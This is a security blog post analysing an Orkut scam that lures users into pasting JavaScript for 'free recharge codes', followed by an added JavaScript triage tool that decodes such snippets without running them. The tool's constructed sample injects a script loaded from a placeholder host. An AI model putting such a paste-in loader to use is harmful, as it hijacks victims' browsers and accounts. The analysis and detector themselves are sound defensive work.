Here’s a curious scam putting users of Google’s Orkut in the crosshairs. There are a number of sites out there claiming a “free recharge code” (presumably they mean call credits) will be posted to your Orkut scrapbook, but only if you take some random JavaScript code – oh dear – and paste it into your browser.
We’ve seen that particular wheeze before, but let’s see what they’re doing with it here. This is one of the sites in question:
Shall we take a look at the JavaScript?
You may be able to see the URL already. Let’s clean it up a little bit:
Can you see it yet? “Snurl(dot)com/fr33ee”.
That triggers a big page of JavaScript code located at orkutaddict(dot)net/freerecharge/dpd(dot)js. At this point, the path branches off depending on whether you’re logged into Orkut or not. If you’re not, you’ll see this popup:
“We are done now, login to Orkut and you’ll have your free recharge in just 24 hours”.
You’re then dumped at the following page, located at freerecharge(dot)orkutaddict(dot)net:
“Sign in to OrkutPorn with your Google Account”.
Yeah, right.
Now we’ll see what happens if the victim pastes the JavaScript into their browser while logged into Orkut. First you’re asked for your mobile number:
Then you’re given a collection of popup boxes promising you wonderful “recharge codes”.
After all of that, you’re dumped at a site flagged as a Phish:
Worse, your Orkut account has started to spam out messages galore:
Here’s another one:
Even better(!), they’ve automatically signed you up to a collection of groups.
While Orkut Codes and Orkut Tools look legit, the middle group with 1,811 “members” is clearly related to this particular shenanigan. As you’ve probably guessed, all of the spamlinks on the profiles and in the group take you to more sites asking victims to cut and paste JavaScript into their browser – many of which give you rather cheeky popups like this one begging for free advert clicks:
In conclusion, then, we have a whole bunch of dodgy JavaScript, phish pages, advert clicking, spammed messages on profiles and popup boxes asking for mobile phone numbers.
Is this the concluding part of the writeup where I advise you to avoid the above at all costs?
You better believe it.
Christopher Boyd
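The "clean it up a little bit" step from earlier in this post, as an added example (not the scam's code and not code from the original post): a static JavaScript check that unwraps a pasted `javascript:` snippet without running it and reports any URL it would load script from. The decoding layers, the `short.example` host, the `SHORTENERS` list and the sample string are assumptions constructed for illustration.

```javascript
// Static triage of text a user has been told to paste into the address bar.
// The snippet is never evaluated; only common string encodings are unwrapped.

// Assumed obfuscation layers (typical ones, not taken from the post).
const LAYERS = [
  // %68%74 percent-encoding; malformed runs are left untouched
  s => s.replace(/(?:%[0-9a-f]{2})+/gi, m => { try { return decodeURIComponent(m); } catch { return m; } }),
  // \x68 and \u0068 escapes
  s => s.replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/gi, (_, x, u) => String.fromCharCode(parseInt(x || u, 16))),
  // String.fromCharCode(104, 0x74, ...) becomes a quoted literal
  s => s.replace(/String\.fromCharCode\(([\s\d,xa-f]+)\)/gi,
    (_, a) => JSON.stringify(String.fromCharCode(...a.split(',').map(Number)))),
  // 'ht' + 'tp' adjacent literals are joined
  s => s.replace(/["']\s*\+\s*["']/g, ''),
];

// Placeholder list (constructed); fill with the shortening services you actually see.
const SHORTENERS = new Set(['short.example']);

function unwrap(snippet, maxRounds = 8) {
  let cur = snippet.trim().replace(/^javascript\s*:/i, '');
  for (let i = 0; i < maxRounds; i++) {
    const next = LAYERS.reduce((s, layer) => layer(s), cur);
    if (next === cur) break; // fixed point: nothing left to decode
    cur = next;
  }
  return cur;
}

const hostOf = u => { try { return new URL(u).hostname.toLowerCase(); } catch { return ''; } };

function triage(snippet) {
  const decoded = unwrap(snippet);
  const urls = [...new Set(decoded.match(/https?:\/\/[^\s"'<>)\\]+/gi) || [])];
  const injectsScript = /createElement\(\s*["']script["']\s*\)|<script[^>]*\bsrc\s*=/i.test(decoded);
  return {
    isJavascriptUri: /^\s*javascript\s*:/i.test(snippet),
    urls,                                        // every distinct http(s) URL found after decoding
    loadsRemoteScript: injectsScript && urls.length > 0,
    usesShortener: urls.some(u => SHORTENERS.has(hostOf(u))),
  };
}

// Constructed sample, not the code from the post; short.example is a placeholder host.
const SAMPLE = "javascript:d=document;s=d.createElement('script');" +
  "s.src='ht'+'tp://'+String.fromCharCode(115,104,111,114,116)+'%2eexample/abc123';" +
  "void(d.body.appendChild(s))";
console.log(triage(SAMPLE));
```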